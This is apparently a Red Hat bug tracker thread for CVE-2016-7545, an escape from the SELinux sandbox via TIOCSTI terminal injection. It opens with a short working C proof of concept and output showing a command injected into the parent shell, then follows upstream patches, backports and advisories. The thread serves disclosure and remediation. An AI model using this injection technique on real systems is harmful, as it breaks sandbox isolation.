Hi, When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox. $ cat test.c #include <unistd.h> #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); execlp("/bin/id", "id", NULL); } $ gcc test.c -o test $ /bin/sandbox ./test id uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176 [saken@ghetto ~]$ id <------ did not type this uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 This is similar to CVE-2016-2568, CVE-2016-2779, etc. Thanks, Federico Bento.
Upstream mailing list discussion: * https://marc.info/?t=147463464400001&r=1&w=2
Created policycoreutils tracking bugs for this issue: Affects: fedora-all [bug 1378932]
Upstream fixes: * https://marc.info/?l=selinux&m=147465156612756&w=2 * https://marc.info/?l=selinux&m=147466045909969&w=2
This was assigned CVE-2016-7545.
References: http://seclists.org/oss-sec/2016/q3/606
(In reply to Paul Moore from comment #4) > Upstream fixes: > > * https://marc.info/?l=selinux&m=147465156612756&w=2 To be clear, the patch above is not strictly necessary, but very helpful. commit 5b98f39de5119dcc865f6c7923682fb10219d45a Author: Petr Lautrbach <plautrba> Date: Fri Sep 23 19:24:15 2016 +0200 sandbox: do not try setup directories without -X or -M sandbox tried to copy all affected files to the new home or tmp even though -M or -X was not specified and there was no new directory. Fixes: $ sandbox ls ~ /usr/bin/sandbox: [Errno 17] File exists: '/root' Signed-off-by: Petr Lautrbach <plautrba> > * https://marc.info/?l=selinux&m=147466045909969&w=2 This is the patch that fixes the vulnerability. commit acca96a135a4d2a028ba9b636886af99c0915379 Author: Petr Lautrbach <plautrba> Date: Fri Sep 23 19:24:16 2016 +0200 sandbox: create a new session for sandboxed processes It helps to prevent sandboxed processes to inject arbitrary commands into the parent. Signed-off-by: Petr Lautrbach <plautrba>
Created attachment 1205640 [details] Basic SRPM patch against Rawhide (no changelog or rev bumps)
Created attachment 1205641 [details] Rawhide patch (policycoreutils-2.5-17.fc26.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848819
Created attachment 1205642 [details] F25 patch (policycoreutils-2.5-17.fc25.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848928
Created attachment 1205646 [details] F24 patch (policycoreutils-2.5-14.fc24.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849131
Created attachment 1205663 [details] F23 patch (policycoreutils-2.4-22.fc23.src.rpm) Koji scratch-build: * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849416
Created attachment 1205679 [details] RHEL-7.3 patch (policycoreutils-2.5-9.el7.src.rpm)
Created attachment 1205701 [details] RHEL-6.9 patch (policycoreutils-2.0.83-30.el6.src.rpm)
NOTE: It looks like we did not backport the SELinux sandbox code to RHEL-5.x.
NOTE: While I've backported and done scratch builds for Rawhide, F25, F24, F23, RHEL-7.3, and RHEL-6.9, I haven't yet had a chance to verify these patches/builds.
This issue has been addressed in the following products: Red Hat Enterprise Linux 7 Red Hat Enterprise Linux 6 Via RHSA-2016:2702 https://rhn.redhat.com/errata/RHSA-2016-2702.html
This issue has been addressed in the following products: Red Hat Enterprise Linux 7.1 Extended Update Support Via RHSA-2017:0536 https://rhn.redhat.com/errata/RHSA-2017-0536.html
This issue has been addressed in the following products: Red Hat Enterprise Linux 7.2 Extended Update Support Via RHSA-2017:0535 https://rhn.redhat.com/errata/RHSA-2017-0535.html